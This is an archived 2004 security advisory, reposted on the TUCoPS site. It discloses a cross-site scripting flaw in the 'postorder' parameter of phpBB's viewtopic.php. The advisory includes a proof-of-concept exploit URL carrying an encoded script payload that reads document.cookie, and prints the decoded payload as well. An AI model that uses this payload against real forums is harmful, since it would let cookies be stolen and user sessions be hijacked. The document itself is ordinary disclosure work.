Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: Frequently Exploited :: hack3696.htm

phpBB ViewTopic.php Cross Site Scripting Vulnerability



New phpBB ViewTopic.php Cross Site Scripting Vulnerability



################################################

Advisory Name:New phpBB ViewTopic.php Cross Site Scripting Vulnerability

Release Date: Feb 29,2004 

Application: phpBB 

Platform: PHP

Version Affected: the lastest version

Vendor URL: http://www.phpbb.com/ 

Discover: Cheng Peng Su(apple_soup_at_msn.com)

################################################



Details:

    This vuln is similar to Arab VieruZ's advisory 'XSS bug in phpBB',this time the problem is not in 'highlight' ,but in 'postorder'.we can inject HTML code,such code could be used to steal cookie information.



Proof of Concept:

     If there is a topic at 

  http://site/phpBB/viewtopic.php?t=123456 

  this page can be also viewed at

  http://site/phpBB/viewtopic.php?t=123456&postorder=asc 

  then this page will contain code like below:

  [Topic Title].

  phpBB doesn't filter out illegal characters from 'postorder',so we can inject HTML code after 'postorder='.



Exploit:

  URL: http://site/phpBB/viewtopic.php?t=123456&postorder=%22%3E%3C%7 3%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C



  note unescape('=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C') == '"><script>alert(document.cookie)</script><'



Contact:

Cheng Peng Su

apple_soup_at_msn.com

Class 1,Senior 2,High school attached to Wuhan University

Wuhan,Hubei,China


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH